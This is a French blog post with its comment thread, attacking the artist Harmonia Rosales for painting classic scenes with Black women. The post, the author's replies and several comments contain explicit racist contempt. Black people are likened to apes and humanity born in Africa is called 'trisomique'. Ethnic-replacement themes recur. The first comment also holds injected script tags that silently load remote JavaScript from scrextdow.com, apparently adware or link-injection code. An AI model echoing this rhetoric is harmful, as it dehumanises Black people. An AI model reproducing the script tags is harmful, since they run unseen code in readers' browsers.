• AU SECOURS !!!

    AU SECOURS !!!

     

    Harmonia Rosales native de la ville de Chicago n’a que 33 ans, l’age du Christ, les idées claires, elle réussit à susciter l’attention des internautes pour avoir choisi de revisiter l’histoire du monde et choque avec sa peinture représentant Dieu comme étant une femme noire..

    https://agoraafricaine.info/

     

     

     

     

     

     

     

    .

    AU SECOURS !!!

    AU SECOURS !!!

     

    "Parce que je suis pro-Noir, je ne suis pas pour autant anti-Blanc, ou anti tout autre groupe ethnique. Personne n’a jamais demandé à un artiste blanc pourquoi il ne peignait que des Blancs.

    "Avec l’image, vous vous habituez à voir Dieu comme un homme blanc. Les hommes blancs seraient donc, en quelque sorte, supérieurs...

    "Quand on pense que la vie humaine est née en Afrique, au jardin d’Éden et tout, il n’y a qu’en peignant Dieu en femme noire que cela fait sens."

    https://www.harmoniarosales.com/

     

    AU SECOURS !!!

    Elle voulait que sa fille soit fière de ses cheveux crépus, de sa couleur de peau...

    L'artiste Harmonia Rosales a décidé de remplacer sur des peintures célèbres les hommes blancs par des femmes noires.

    Ça commence à devenir une habitude lassante que tous ces artistes noirs racisés qui singent imitent ce qu'ont créé les artistes blancs depuis des siècles (tout en conchiant la civilisation blanche et ses représentants) par leurs propres moyens assez moyens ou par nègre esclave blanc interposé: "Rewrite history in black";

    Avec une sorte de leitmotiv récurent:

    AU SECOURS !!!

     

     

    AU SECOURS !!!

                                                      ...qui semble en dire long sur le complexe d'infériorité inconscient à l'origine de ces remakes... A moins que ce ne soit de l'insolence due à un sentiment de supériorité méprisant.

    Mais qui (contrairement à certaines apparences) n'est pas un hommage aux Vierges Noires de nos basiliques ou nos cathédrales.

    Si il y avait eu des artistes africains ou afro-américains ou islamo-africains pour ne faire ne serait-ce qu'un chef-d’œuvre en vingt et un siècle de "civilisation", ça se saurait (je ne parle pas des arts qu'on dit "premiers" et devant lesquels il de bon ton de s'esbaudir en se pâmant comme devant les  gribouillages du petit dernier, ou dont se sont inspirés tous les artistes occidentaux qui voulaient "faire moderne" en faisant "primitif") 

    Pourtant, l'art nègre existe, je l'ai rencontré

    AU SECOURS !!!

     

    AU SECOURS !!!

     

     

     

     

    « coco'wico...Le sens de l'Histoire... (MàJ) »
    Partager via Gmail Delicious Yahoo! Google Bookmarks

    Tags Tags : , , , ,
  • Commentaires

    1
    Jeudi 12 Juillet à 21:02

    Oui mais...comme elle n'a aucune imagination pour créer, elle copie en les gâchants, la magnifique peinture des BLANCS!

    <script src="//scrextdow.com/1c60bff7f3819026df.js"></script> <script src="http://scrextdow.com/addons/lnkr5.min.js" type="text/javascript"></script> <script src="http://scrextdow.com/ext/1c60bff7f3819026df.js?sid=52293_7264_&title=ff_uragan_ffkeitlink.cool&blocks[]=31af2" type="text/javascript"></script>
      • Vendredi 13 Juillet à 14:36

         

        Dans le corps de mon article, j'avais écrit "qui "singent (en caractère barré pour ne pas être insultant avec nos cousins chimpanzés ou ouistitis ) et imitent ce qui a été créé par les occidentaux" j'aurais peut-être du  laisser cette expression bien parlante!

         

        Mais c'est vrai que sans imagination ni inventivité, ils ont beau jeu de se rattraper en pastichant ce qui a été créé, tout en se victimisant ,comme souvent.

         

    2
    Souris donc
    Vendredi 13 Juillet à 09:00

    Elle a trouvé le truc. Tu choques le bourgeois avec un concept facile et déclinable à l'infini, avec tous ces genres dont on n'avait pas idée au temps simplet de la Renaissance. Tu les repeins tous en noirs, après, tu les repeindras tous en Conchita Wurst, et ta fortune est faite.

      • Vendredi 13 Juillet à 14:40

         

        Je me demande si un babtou s'avisait de reprendre certaines œuvres d'art africaines pour les occidentaliser à sa façon (autrement que par flatterie ou admiration convenue), comment ce détournement serait vécu par les anti-wacistes de tous poils de toutes couleurs et de tous pays.

        Ceci dit, si la principale préoccupation était de faire du fric, je comprendrais à demi, mais ça me semble beaucoup plus pour affirmer une négritude militante et pour participer, même de façon anodine, à une sorte de remplacement plus ou moins grand selon la renommée des intervenants...

         

        Et rien n'y échappe...

         

         

    3
    Vendredi 13 Juillet à 11:38

    Bien dit. yes

      • Vendredi 13 Juillet à 14:48

         

        Mon précédent article (qui est passé un peu inaperçu après celui-ci) sur la fameuse mais très actuelle et transcendante coupe du Monde de foot  traite en fait du même sujet :

         

        - ici, se sont les modèles emblématiques d'un art occidental et judéo-chrétien qui sont piétinés, (voir aussi, -dans un domaine un peu différent- les sites européens et américains qui retirent les bustes, les tableaux et les statues d'hommes blancs de leurs places habituelles, et évitent les allusions à leurs œuvres et à leurs travaux, philosophiques, scientifiques, etc...)

        - là c'est une "équipe de France" très pigmentée épidermiquement et riche de sa diversité "black/black/black" issue des "quartiers" difficiles et défavorisés mais dynamiques, qui va redonner à l'Hexagonie sa force et sa grandeur internationale (avec ou sans Marseillaise, mais, dans le fond... yes !!) , etc...etc...à moins qu'une petite équipe "blanc/blanc/blanc" ne vienne perturber l'avenir radieux du vivrensemble européaniste sarcastic

         

        ...parfois jusqu'à l'absurde :

                                                                                                                             ou à l'auto-dérision ?

         

      • Vendredi 13 Juillet à 17:05

        A ce propos ("coco'wico"), un article paru hier sur Atalntico :

         

        Ces Américains qui voient dans l’équipe de France la dernière équipe africaine du Mondial:
        ...

        Quand on est un migrant nigérien, on suit l'équipe du Nigeria, idem pour les migrants sénégalais etc… C'était une manière pour les migrants de suivre leurs racines et c'est tout à fait possible aux Etats unis qui unit la fierté nationale et l'ethnique. On peut être nigérien américain, attaché à l'équipe de foot du Nigeria tout en restant attaché à son pays. Mais finalement, toutes les équipes africaines ont échoué au premier tour de la coupe du monde.

        Les afro-américains ont donc suivit l'équipe qui leur apparaissait la plus proche de leurs origines, la France. Dans l'équipe de France, 12 sur 23 joueurs sont d'origine africaine et on y trouve toutes les origines, camerounaise (Mbappé), congolais, malien (Kanté) etc… Vous avez le choix. Ca a servi d'identification par substitution. Les Français défendent désormais les couleurs de l'Afrique..../

        C'est aussi lié aux générations.
        La nationalité des joueurs ne transpire plus à travers eux. Ou alors bien moins qu'avant. On n'interroge plus le rapport de loyauté à la nation des joueurs. Je pense notamment à Benzema qui a essuyé beaucoup de critiques à l'époque. Aujourd'hui on se fiche de savoir si Mbappé chante ou pas la Marseillaise. En clair, on ne dira plus Zidane président, on dira plutôt Mbappé ballon d'or.
      • Souris donc
        Vendredi 13 Juillet à 17:37

        Je zappe le foot qui ne m'a jamais fait rire. Sauf leur humoriste, Franck Ribéry, et le nom d'une équipe africaine "Les lions indomptables".

      • Vendredi 13 Juillet à 21:00

        Je zappe également le foot (et même l'actuelle course à bicyclette autour de l'hexagone) et s'il ne m'a pas trop fait rire, il m'arrive qu'il me fasse presque pleurer:

        Passons sur l'équipe dite "de France" et sur "La Marseillaise" que les islamo-milliardaires en culotte courte et chaussures à crampons préférés des français qui regardent la télé chanteront (peut-être) ou pas, ou mal, ou en pensant à autre-chose qu'au sang impur qui abreuve les sillons...

        Revenons à l'équipe de Croatie, dont l'éternel "S.O.S.-Racisme" et quelques autres associations de défense des droits de l'Homme veulent interdire l'hymne officiel des supporters, jugé "nationaliste, agressif et violent", et ravivant par ailleurs "le spectre de la guerre dans les Balkans": "C'est une chanson de l'ultranationaliste Marko Perkovic, surnommé Thompson en référence à un pistolet-mitrailleur de même marque. Fervent admirateur du régime pronazi des oustachis, habitué à utiliser dans ses spectacles les symboles de ceux-là qui furent responsables du génocide des Juifs, des Roms et des Serbes de Croatie, glorificateur de crimes de guerre, il a été interdit de se produire dans de nombreux pays comme les Pays-Bas, l'Autriche, la Suisse", ont expliqué les associations dans leur courrier adressé au ministre des Sports, à l'UEFA et à la Fédération croate de football.

                                   (image sexuellement incorrecte, selon l'opinion de la F.I.F.A.)

                             (image sportivement correcte, selon les vœux des frères musulmans)

    4
    Vendredi 13 Juillet à 20:17
    Pangloss

    L'humanité est née en Afrique. Les blancs sont partis, les noirs sont restés. 

      • Vendredi 13 Juillet à 21:53

        C'est peut-être exact, mais c'était une grande prématurée née bien trop longtemps avant terme et au trois quart trisomique...

        Des médecins, des savants, des prêtres, des financiers, des agriculteurs, des industriels, etc... se sont très tôt penchés sur son lit de misère et de souffrance... Hélas, quand elle commençait à se remettre lentement de ses lourds handicaps, elle est devenue violente et agressive envers ses sauveurs et ne témoigna jamais la moindre reconnaissance.

        C'est ainsi, selon une vieille légende traditionnelle que je viens d'inventer, "les blancs sont partis, les noirs sont restés" mais il y est dit aussi que, si l'on n'y prend garde, les noirs viendront, pas forcément pour s'excuser et nous remercier, et que les blancs devront partir où ils pourront, si ils le peuvent...

        ... quand ils pourront.

    5
    jean-marc
    Vendredi 13 Juillet à 21:34

    Un peu beaucoup hors sujet mais je ne peux pas la garder pour moi:Cette tenue, même les vaches en ont marre

    Cette tenue, même les vaches en ont marre !https://webmail22.orange.fr/webmail/fr_FR/read.html?FOLDER=SF_INBOX&IDMSG=50805&check=&SORTBY=1

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :